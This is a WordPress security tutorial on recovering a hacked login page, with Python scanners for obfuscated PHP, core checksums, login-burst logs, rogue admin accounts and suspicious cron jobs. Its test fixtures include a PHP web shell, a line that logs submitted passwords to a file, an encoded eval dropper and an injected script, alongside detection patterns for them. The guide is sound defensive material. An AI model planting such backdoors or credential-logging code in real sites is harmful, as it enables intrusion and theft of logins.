Having your WordPress login page hacked is one of the worst scenarios any site owner can face. Not only does it break access to your admin area, but it can lead to malware injections, data theft, SEO penalties, and domain blacklisting.

This guide is designed to be the **deepest, most practical, research-backed article** on cleaning up a hacked WordPress login page — complete with examples, step-by-step tools, and real world techniques that experts use on production sites.

Before you fix anything, you need to know how attackers break in. The WordPress login page (/wp-login.php, which /wp-admin redirects to for anyone not logged in) is one of the most heavily targeted entry points, because a successful login as an administrator grants full control of the site.

  • Brute-Force Attacks: Automated bots repeatedly guess usernames and passwords.
  • Credential Stuffing: Using leaked username/password pairs from other breaches.
  • Exploited Plugins/Themes: Vulnerabilities that allow attackers to inject malicious code into the login process.
  • Backdoors: Malware installed earlier that re-opens access even after cleanup.
  • Phishing & Social Engineering: Fake login prompts tricking admins into giving credentials.

Hackers don’t “hack WordPress” — they exploit poor configurations, weak passwords, and unsecured paths. Fixing the login page without addressing underlying weakness is like replacing a lock while leaving the door open.

Knowing a hack has happened is critical because not every breach is obvious.

  • Cannot access /wp-admin or login redirects unexpectedly
  • Login form displays unfamiliar fields, captcha bypasses, or extra scripts
  • Unexpected users with administrator role appear
  • Google shows “site may be hacked” warnings
  • Emails notifying password changes you didn’t initiate

If you suspect a hack:

  • Put the site into maintenance mode so visitors are not served malicious content while you work
  • Temporarily disable plugins that affect login security
  • Create a backup of the compromised site, files and database both, so you can analyse it later

⚠ Do NOT start random changes before creating a backup. Cleaning without preserving a snapshot can destroy evidence and make recovery harder.

Use multiple tools — no single scanner catches everything.

Online Scanners

Server-Side Scanners

  • Sucuri Security Plugin
  • Wordfence Scan
  • Maldet (Linux Malware Detect)

These tools detect malware signatures, backdoors, and injected scripts. You should perform both external and internal scans for best coverage.

Scanners often point you to files with malicious content. Common files attacked include:

  • wp-login.php modifications
  • functions.php injections
  • Plugin and theme files with obfuscated code (base64, eval, etc.)

// Example of suspicious obfuscated code

 $bad = base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYmFkc2NyaXB0JykpIHsgaW5zZXJ0X2J...'); eval($bad);

If you see base64_decode, eval, gzuncompress or gzinflate, str_rot13, create_function, or strings assembled from chr() calls and then executed, treat them as red flags. One caveat: some legitimate plugins use base64_decode for bundled assets or settings, so compare a suspicious file with the same version from the official plugin or theme repository before deleting it.
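As an added example (not code from the original article), here is a small heuristic scanner in Python for exactly those patterns. It scores each file on the indicators listed above and ranks the hits, so a single base64_decode in a legitimate plugin does not drown out a file that decodes a blob and then eval()s it. The weights, the threshold and the three sample files are constructed for the demonstration.

```python
import os
import re
from typing import Dict, List, Tuple

# Indicator name, pattern, weight. The weights are an assumption used only
# for ranking; a lone base64_decode() is common in legitimate plugins.
INDICATORS: List[Tuple[str, re.Pattern, int]] = [
    ("eval", re.compile(r"\beval\s*\("), 3),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), 2),
    ("decompress", re.compile(r"\b(gzuncompress|gzinflate|str_rot13)\s*\("), 2),
    ("dynamic_call", re.compile(r"\b(create_function|assert)\s*\("), 2),
    ("request_input", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\["), 1),
    # A long run of base64 alphabet characters inside a quoted string.
    ("long_b64_blob", re.compile(r"['\"][A-Za-z0-9+/=]{60,}['\"]"), 2),
    # Payloads assembled from chr() calls to dodge plain-text signatures.
    ("chr_concat", re.compile(r"(chr\s*\(\s*\d+\s*\)\s*\.\s*){4,}"), 2),
]


def score_source(src: str) -> Tuple[int, List[str]]:
    """Score one file's text; returns (score, names of matched indicators)."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    # eval() fed by a decoder or by request input in the same file is the
    # classic dropper / web shell shape and gets extra weight.
    if "eval" in hits and any(h in hits for h in ("base64_decode", "decompress", "request_input")):
        score += 3
    return score, hits


def scan_files(files: Dict[str, str], threshold: int = 5) -> List[dict]:
    """Return the files whose score reaches the threshold, highest score first."""
    findings = []
    for path, src in files.items():
        score, hits = score_source(src)
        if score >= threshold:
            findings.append({"path": path, "score": score, "indicators": hits})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


def load_php_tree(root: str) -> Dict[str, str]:
    """Read every .php file under root (uploads/ included: PHP has no business there)."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(".php"):
                p = os.path.join(dirpath, n)
                with open(p, errors="replace") as fh:
                    out[os.path.relpath(p, root)] = fh.read()
    return out


# Constructed samples: a dropper like the snippet above, a request-driven
# web shell, and a benign base64_decode() that should not be flagged.
SAMPLES = {
    "wp-content/themes/twentytwentyfour/functions.php":
        "<?php\n$bad = base64_decode('" + "aWYo" * 20 + "');\neval($bad);\n",
    "wp-content/uploads/2024/05/.cache.php":
        "<?php if(isset($_REQUEST['c'])){ @eval(stripslashes($_REQUEST['c'])); }\n",
    "wp-content/plugins/example/example.php":
        "<?php\n// legitimate: decoding an icon stored in the plugin's settings\n"
        "$icon = base64_decode(get_option('example_icon'));\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLES):
        print(f"{f['score']:>2}  {f['path']}  {', '.join(f['indicators'])}")
```

On a real site, point load_php_tree at wp-content (or the whole document root) and pass its result to scan_files; anything it ranks highly still needs a human to read it before deletion.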

The fastest way to replace hacked core files is to do a clean install:

  • Download WordPress fresh from wordpress.org, matching the version the site runs
  • Replace all core files except wp-config.php and wp-content
  • Check that .htaccess hasn't been modified (the core package does not ship one, so whatever is there is site-specific)
  • Treat wp-content separately: reinstall plugins and themes from their official sources and look for PHP files under uploads/, because the clean core package never touches that directory

Never trust a core file from an unknown source. Always use the official WordPress package.
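To confirm the replacement actually worked, compare the install against a known-good checksum list. WP-CLI does this for a live site with wp core verify-checksums; the added Python example below (not part of the article) does the same thing offline against a manifest of relative path to MD5 hash, which is the shape returned by the wordpress.org checksums API, and it skips wp-config.php and wp-content exactly as the steps above do. The install it checks is constructed inline, with one tampered core file and one dropped backdoor.

```python
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List, Tuple

SKIP_PREFIXES = ("wp-content/",)   # handled separately, see the steps above
SKIP_FILES = {"wp-config.php"}     # site-specific, never in the package


def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_core(root: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the files under root with manifest (relative path -> md5 hex).
    'unexpected' lists files the official package does not ship, which is
    where dropped backdoors and a tampered .htaccess show up for review."""
    on_disk: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in SKIP_FILES or rel.startswith(SKIP_PREFIXES):
                continue
            on_disk[rel] = md5_file(full)
    return {
        "modified": sorted(p for p, d in manifest.items() if p in on_disk and on_disk[p] != d),
        "missing": sorted(p for p in manifest if p not in on_disk),
        "unexpected": sorted(p for p in on_disk if p not in manifest),
    }


def build_demo_install() -> Tuple[str, Dict[str, str]]:
    """Constructed stand-in for a real install: a manifest computed from
    'official' contents, then a disk copy with one tampered core file and
    one dropped backdoor. Returns (root directory, manifest)."""
    official = {
        "index.php": b"<?php define('WP_USE_THEMES', true); require 'wp-blog-header.php';\n",
        "wp-login.php": b"<?php /* clean login page */ require 'wp-load.php';\n",
        "wp-includes/version.php": b"<?php $wp_version = '6.5';\n",
    }
    manifest = {p: hashlib.md5(b).hexdigest() for p, b in official.items()}
    on_disk = dict(official)
    # Credential-stealing code appended to the login page and a backdoor
    # dropped into wp-includes; wp-config.php and wp-content exist but are skipped.
    on_disk["wp-login.php"] += b"<?php @file_put_contents('/tmp/.c', $_POST['log'] . ':' . $_POST['pwd'], FILE_APPEND);\n"
    on_disk["wp-includes/.cache.php"] = b"<?php eval($_REQUEST['x']);\n"
    on_disk["wp-config.php"] = b"<?php define('DB_NAME', 'wp');\n"
    on_disk["wp-content/plugins/hello.php"] = b"<?php // out of scope for the core check\n"
    root = tempfile.mkdtemp(prefix="wpcheck-")
    for rel, data in on_disk.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root, manifest


def demo() -> Dict[str, List[str]]:
    root, manifest = build_demo_install()
    try:
        return verify_core(root, manifest)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:>10}: {paths}")
```

Run it before the reinstall to see what the attacker changed, and again afterwards, when the only acceptable result is an empty modified list and an unexpected list you can explain file by file.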

After cleaning, reset access everywhere:

  • All admin passwords
  • Database user password
  • FTP/SFTP passwords
  • API and hosting control panel passwords

Also regenerate your WordPress salts in wp-config.php:

 // Generate fresh secure keys (values left empty here as placeholders)
 define('AUTH_KEY',         '');
 define('SECURE_AUTH_KEY',  '');
 define('LOGGED_IN_KEY',    '');
 define('NONCE_KEY',        '');
 // The same applies to AUTH_SALT, SECURE_AUTH_SALT, LOGGED_IN_SALT and NONCE_SALT.

You can get fresh keys from the WordPress.org Secret Key Generator at https://api.wordpress.org/secret-key/1.1/salt/. Rotating the keys and salts invalidates every existing login cookie, which is exactly what you want after a compromise: any session the attacker still holds is logged out.
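If you would rather not paste secrets fetched over the network, you can generate them locally. The Python example below is added here and is not from the article or from WordPress: it builds all eight keys and salts with the secrets module, using the same character set as the wordpress.org generator (printable ASCII without quotes and backslash), and rewrites the define() lines in a wp-config.php, appending any the file lacks. The sample wp-config.php content is constructed for the demo. WP-CLI's wp config shuffle-salts does the equivalent on a live site.

```python
import re
import secrets
from typing import Dict

KEY_NAMES = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
# Printable ASCII 33..126 without ' " \ so every value is safe inside a
# single-quoted PHP string.
ALPHABET = "".join(chr(c) for c in range(33, 127) if chr(c) not in "'\"\\")


def new_key(length: int = 64) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def new_key_set() -> Dict[str, str]:
    return {name: new_key() for name in KEY_NAMES}


# Matches define('NAME', 'value'); with either quote style and loose spacing.
_DEFINE_RX = re.compile(
    r"define\(\s*['\"](?P<name>[A-Z_]+)['\"]\s*,\s*['\"](?P<value>[^'\"]*)['\"]\s*\);"
)


def rotate_salts(config_text: str, keys: Dict[str, str]) -> str:
    """Replace the define() lines for the eight names and append any that are
    absent, so a wp-config.php that only had four keys ends up with all eight.
    Other define() lines (DB_NAME, DB_PASSWORD, ...) are left untouched."""
    seen = set()

    def sub(m: "re.Match") -> str:
        name = m.group("name")
        if name in keys:
            seen.add(name)
            return f"define('{name}', '{keys[name]}');"
        return m.group(0)

    out = _DEFINE_RX.sub(sub, config_text)
    extra = "".join(f"define('{n}', '{keys[n]}');\n" for n in KEY_NAMES if n not in seen)
    if extra:
        out = out.rstrip("\n") + "\n" + extra
    return out


# Constructed wp-config.php fragment with only four of the eight keys set.
SAMPLE_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
$table_prefix = 'wp_';
"""


def demo() -> str:
    return rotate_salts(SAMPLE_CONFIG, new_key_set())


if __name__ == "__main__":
    print(demo())
```

Write the result back to wp-config.php only after the file cleanup is done; otherwise a backdoor that reads the file can simply pick up the new values.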

1. Limit Login Attempts

Prevent brute force and credential stuffing by restricting failed attempts.

2. Two-Factor Authentication (2FA)

Always enable 2FA for admin users: even if an attacker guesses or steals a password, the login still fails without the second factor, which defeats automated login attacks.

3. Rename wp-login URL

Changing /wp-login.php to a custom URL cuts most of the automated bot traffic, because bots hard-code the default path. It is obscurity rather than a security control, so combine it with login limits and 2FA rather than relying on it alone.

4. Block XML-RPC (if not used)

Many bots abuse XML-RPC (xmlrpc.php), whose system.multicall method lets a single request carry hundreds of login attempts, bypassing per-request login limits. Disable it if nothing (such as the mobile app or Jetpack) needs it.

A small business site was repeatedly losing admin access due to brute force. The attacker injected rogue code in both wp-login.php and functions.php.

  • Step 1: Site was isolated and backup created
  • Step 2: Server scan found hidden backdoor including base64 injections
  • Step 3: Core files were replaced with fresh copies
  • Step 4: All passwords were reset
  • Step 5: Login path was changed, and login limits enforced

Result: Site stayed secure for 18+ months without a single login compromise.

  • Verify the role of every user account and that legitimate administrators can log in normally
  • Confirm no unknown users exist
  • Ensure security logs are enabled
  • Submit site to Google Search Console diagnostics

Can hackers still break in after cleanup?

If hidden backdoors remain, yes. That is why multiple scans and a manual code review are vital.

Do I need premium security plugins?

Not required, but stronger scanning, firewall, and monitoring help protect high-risk sites.

Proactive security is ALWAYS cheaper than reactive cleanup.

Cleaning a hacked WordPress login page is not just about fixing one file — it’s about eliminating backdoors, locking down credentials, and rebuilding trust in your site.

This guide gives you a **full, professional roadmap** of the kind security teams follow, and applying it makes your WordPress site far more resilient.

If you want a deeper next step with advanced real-time protection and automated monitoring, you can check this comprehensive resource:

WordPress Security: The Complete Guide From Basic to Advanced Protection

Cleaning visible malware is not enough. If you don’t understand how the attacker got in, your login page can be compromised again.

Check these logs from your hosting control panel or server:

  • Access logs (repeated POST requests to wp-login.php)
  • Error logs (failed login scripts or unknown PHP files)
  • Security plugin logs (blocked IPs and attempts)

If you see thousands of failed login attempts from the same IP ranges, that confirms a brute-force or credential-stuffing campaign. A spread across many IPs sharing the same user agent and timing points to a botnet doing the same thing, so count by user agent and by time window as well as by address.
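An added example (not from the article) of turning that check into code: the Python below parses combined-format access log lines, keeps only POSTs to wp-login.php and xmlrpc.php, and flags any client IP that exceeds a threshold inside a sliding time window. The log lines, the IP addresses (RFC 5737 documentation ranges) and the thresholds are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Apache/Nginx "combined" format; referer and user agent are optional so the
# plain "common" format parses too.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RX.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop ?redirect_to=... and friends
    return rec


def login_bursts(lines: List[str], max_per_window: int = 20, window_s: int = 300) -> Dict[str, dict]:
    """Return ip -> summary for every IP that POSTed to a login endpoint more
    than max_per_window times within any window_s-second window."""
    per_ip: Dict[str, list] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        times = [r["ts"] for r in recs]
        start, peak = 0, 0
        for end in range(len(times)):            # sliding window over sorted times
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > max_per_window:
            flagged[ip] = {
                "attempts": len(recs),
                "peak_in_window": peak,
                "paths": sorted({r["path"] for r in recs}),
                # wp-login.php answers a failed POST with 200 (the form again)
                # and a successful one with a 302 to the admin area, so a 302
                # at the end of a burst usually means a guess worked.
                "redirects": sum(1 for r in recs if r["status"] == 302),
                "user_agents": sorted({r["ua"] or "-" for r in recs}),
            }
    return flagged


def build_sample_log() -> List[str]:
    """Constructed lines, not a real log: one IP hammering wp-login.php until a
    302 (the guess that worked), one IP abusing xmlrpc.php, one ordinary admin."""
    base = datetime(2024, 5, 1, 3, 14, 0, tzinfo=timezone.utc)
    lines: List[str] = []

    def add(ip: str, t: datetime, method: str, path: str, status: int, ua: str) -> None:
        lines.append(f'{ip} - - [{t.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')

    bot = "python-requests/2.31"
    for i in range(30):
        add("198.51.100.7", base + timedelta(seconds=5 * i), "POST", "/wp-login.php", 302 if i == 29 else 200, bot)
    for i in range(25):
        add("192.0.2.44", base + timedelta(seconds=4 * i), "POST", "/xmlrpc.php", 200, bot)
    add("203.0.113.5", base, "GET", "/wp-login.php", 200, "Mozilla/5.0")
    add("203.0.113.5", base + timedelta(seconds=20), "POST", "/wp-login.php?redirect_to=%2Fwp-admin%2F", 302, "Mozilla/5.0")
    return lines


if __name__ == "__main__":
    for ip, info in login_bursts(build_sample_log()).items():
        print(ip, info)
```

An IP whose burst ends in a 302 is the one to treat as a successful compromise: reset that account first and look for what the session did next in the same log.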

Attackers often hide malicious code inside the database, not just files. Even after file cleanup, infected database entries can reinfect your login page.

Check these database locations carefully:

  • wp_users – look for unknown admin accounts
  • wp_usermeta – suspicious role escalations
  • wp_options – injected scripts in the siteurl or home fields, and in widget, theme and plugin settings values

Red flags include encoded JavaScript, iframe tags, or long base64 strings inside option values.
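An added Python example (not from the article) of reviewing exported rows from those three tables. The rows stand in for the output of queries such as SELECT option_name, option_value FROM wp_options and SELECT ID, user_login, user_email, user_registered FROM wp_users, joined with wp_usermeta on user_id; the data, the expected site URL and the list of known administrator logins are constructed for the demo. The wp_ prefix on the capabilities meta key follows $table_prefix in wp-config.php, so adjust it for sites that use a different prefix.

```python
import re
from typing import Dict, List, Set

# Patterns that have no business inside option values on a normal site.
FLAG_RX = {
    "script_tag": re.compile(r"<script\b", re.I),
    "iframe_tag": re.compile(r"<iframe\b", re.I),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
    "eval_like": re.compile(r"\b(eval|atob|unescape|fromCharCode)\s*\(", re.I),
}


def review_options(rows: List[Dict[str, str]], expected_url: str) -> List[dict]:
    """Flag option rows: siteurl/home must equal the expected URL exactly, and
    any value carrying script, iframe or encoded payloads is reported with why."""
    findings = []
    for row in rows:
        name, value = row["option_name"], row["option_value"]
        reasons = [k for k, rx in FLAG_RX.items() if rx.search(value)]
        if name in ("siteurl", "home") and value.rstrip("/") != expected_url.rstrip("/"):
            reasons.append("url_mismatch")
        if reasons:
            findings.append({"option": name, "reasons": reasons, "preview": value[:60]})
    return findings


def find_unknown_admins(users: List[dict], usermeta: List[dict],
                        known_logins: Set[str], prefix: str = "wp_") -> List[str]:
    """Return logins holding the administrator role in wp_usermeta that are
    not on your list of accounts that should be admins. Capabilities are a
    PHP-serialized array, so a substring check on the role name suffices."""
    admin_ids = {
        m["user_id"] for m in usermeta
        if m["meta_key"] == f"{prefix}capabilities" and '"administrator"' in m["meta_value"]
    }
    return sorted(u["user_login"] for u in users
                  if u["ID"] in admin_ids and u["user_login"] not in known_logins)


# Constructed rows: home downgraded to http, a widget carrying an injected
# script, and a rogue administrator created during the attack.
SAMPLE_OPTIONS = [
    {"option_name": "siteurl", "option_value": "https://example.com"},
    {"option_name": "home", "option_value": "http://example.com"},
    {"option_name": "blogname", "option_value": "Example Shop"},
    {"option_name": "active_plugins", "option_value": 'a:1:{i:0;s:19:"akismet/akismet.php";}'},
    {"option_name": "widget_text",
     "option_value": "<script>eval(atob('ZG9jdW1lbnQubG9jYXRpb249Li4u'))</script>"},
]
SAMPLE_USERS = [
    {"ID": 1, "user_login": "admin", "user_email": "owner@example.com", "user_registered": "2021-03-02 10:00:00"},
    {"ID": 3, "user_login": "editor", "user_email": "editor@example.com", "user_registered": "2022-01-10 09:12:00"},
    {"ID": 7, "user_login": "support-wp", "user_email": "svc@example.net", "user_registered": "2024-05-01 03:16:40"},
]
SAMPLE_USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 3, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:6:"editor";b:1;}'},
    {"user_id": 7, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
]

if __name__ == "__main__":
    for f in review_options(SAMPLE_OPTIONS, "https://example.com"):
        print(f)
    print("unknown admins:", find_unknown_admins(SAMPLE_USERS, SAMPLE_USERMETA, {"admin"}))
```

The user_registered timestamp of a rogue account is worth lining up with the access log: it usually lands right after the burst of login attempts that succeeded.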

Hackers often schedule malicious tasks that run silently in the background. These cron jobs can recreate hacked login files even after cleanup.

Use a plugin or WP-CLI to inspect scheduled events:

  • Unknown PHP callbacks
  • Random function names
  • Tasks running every few minutes

Remove any task you do not recognize or cannot trace to a legitimate plugin.
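An added example (not from the article) that automates that review over the JSON WP-CLI emits. It assumes the output of wp cron event list --fields=hook,schedule,interval,args --format=json with those field names; the names are an assumption, so confirm them against your WP-CLI version. The events, the allow-list of known plugin hooks and the interval threshold are constructed for the demonstration; the core hook list is a partial list of the events WordPress schedules for itself.

```python
import json
import re
from typing import List, Set

# Hooks WordPress core schedules for itself (partial list). Anything outside
# it should be traceable to an installed plugin or theme.
CORE_HOOKS = {
    "wp_version_check", "wp_update_plugins", "wp_update_themes",
    "wp_scheduled_delete", "delete_expired_transients",
    "wp_scheduled_auto_draft_delete", "recovery_mode_clean_expired_keys",
    "wp_privacy_delete_old_export_files", "wp_site_health_scheduled_check",
    "wp_update_user_counts", "wp_delete_temp_updater_backups",
}
# No word separators and at least one digit: the shape of a generated name.
RANDOM_NAME_RX = re.compile(r"^[a-z0-9]{8,}$")


def review_cron(events_json: str, known_plugin_hooks: Set[str], min_interval_s: int = 900) -> List[dict]:
    """Flag events that are neither core nor known plugin hooks, that have
    random-looking names, or that run more often than min_interval_s."""
    findings = []
    for ev in json.loads(events_json):
        hook = ev["hook"]
        reasons = []
        if hook not in CORE_HOOKS and hook not in known_plugin_hooks:
            reasons.append("unknown_hook")
        if RANDOM_NAME_RX.match(hook) and re.search(r"\d", hook):
            reasons.append("random_looking_name")
        interval = ev.get("interval") or 0          # 0 / absent: non-repeating
        if interval and interval < min_interval_s:
            reasons.append(f"runs_every_{interval}s")
        if reasons:
            findings.append({"hook": hook, "schedule": ev.get("schedule"), "reasons": reasons})
    return findings


# Constructed stand-in for the WP-CLI JSON: two core events, one known plugin
# event, one generated-name event firing every minute, and one event whose
# name imitates core but is not a core hook.
SAMPLE_EVENTS = json.dumps([
    {"hook": "wp_version_check", "schedule": "twicedaily", "interval": 43200, "args": []},
    {"hook": "wp_update_plugins", "schedule": "twicedaily", "interval": 43200, "args": []},
    {"hook": "example_plugin_cleanup", "schedule": "daily", "interval": 86400, "args": []},
    {"hook": "x9k2f7a1", "schedule": "every_minute", "interval": 60, "args": []},
    {"hook": "wp_update_check_cache", "schedule": "hourly", "interval": 3600, "args": []},
])

if __name__ == "__main__":
    for f in review_cron(SAMPLE_EVENTS, {"example_plugin_cleanup"}):
        print(f)
```

Anything flagged that you cannot trace to a plugin can be removed with wp cron event delete followed by the hook name, but you still have to find and delete the code that registered it, otherwise the event is simply re-scheduled on the next page load.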

Adding server-level restrictions reduces load and blocks automated attacks before WordPress even loads.

Example (Apache):

<Files wp-login.php>
  # Apache 2.4 syntax. 203.0.113.10 is a placeholder: put your own static IP(s) here.
  Require ip 203.0.113.10
</Files>

You can allow specific IPs this way, or protect login access via HTTP authentication if your use case allows it. Note that Require all denied on its own blocks the legitimate administrators along with the bots, so always pair a deny with an allow-list or Basic auth. The same Files block applied to xmlrpc.php closes the other common login channel if the site does not need it.

Even after cleaning a hacked WordPress login page, Google may temporarily reduce visibility to protect users.

To recover faster:

  • Request a security review in Google Search Console
  • Remove any injected SEO spam pages
  • Check for manual actions
  • Ensure noindex tags were not added by malware

Most sites recover rankings within days to weeks after a clean security validation.

  • ✔ Backup the compromised site
  • ✔ Scan files and database
  • ✔ Replace WordPress core files
  • ✔ Remove hidden admin users
  • ✔ Reset all credentials
  • ✔ Secure wp-admin access
  • ✔ Monitor logs and cron jobs
  • ✔ Revalidate site with Google